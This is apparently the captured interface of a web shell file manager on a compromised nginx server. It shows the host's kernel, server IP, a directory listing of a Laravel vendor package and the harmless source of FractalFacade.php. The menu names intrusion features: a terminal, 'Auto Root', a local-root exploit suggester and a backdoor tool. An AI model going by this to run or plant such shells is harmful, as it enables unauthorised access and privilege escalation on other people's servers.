Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.148.243.252
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
1 /
vendor /
spatie /
laravel-fractal /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
Console
[ DIR ]
drwxr-xr-x
2021-02-02 18:21
Facades
[ DIR ]
drwxr-xr-x
2021-02-02 18:21
Fractal.php
3.78
KB
-rw-r--r--
2021-02-02 18:21
FractalFacade.php
335
B
-rw-r--r--
2021-02-02 18:21
FractalServiceProvider.php
1.56
KB
-rw-r--r--
2021-02-02 18:21
helpers.php
557
B
-rw-r--r--
2021-02-02 18:21
Save
Rename
<?php namespace Spatie\Fractal; use Illuminate\Support\Facades\Facade; /** * @see \Spatie\Fractal\Fractal */ class FractalFacade extends Facade { /** * Get the registered name of the component. * * @return string */ protected static function getFacadeAccessor() { return 'fractal'; } }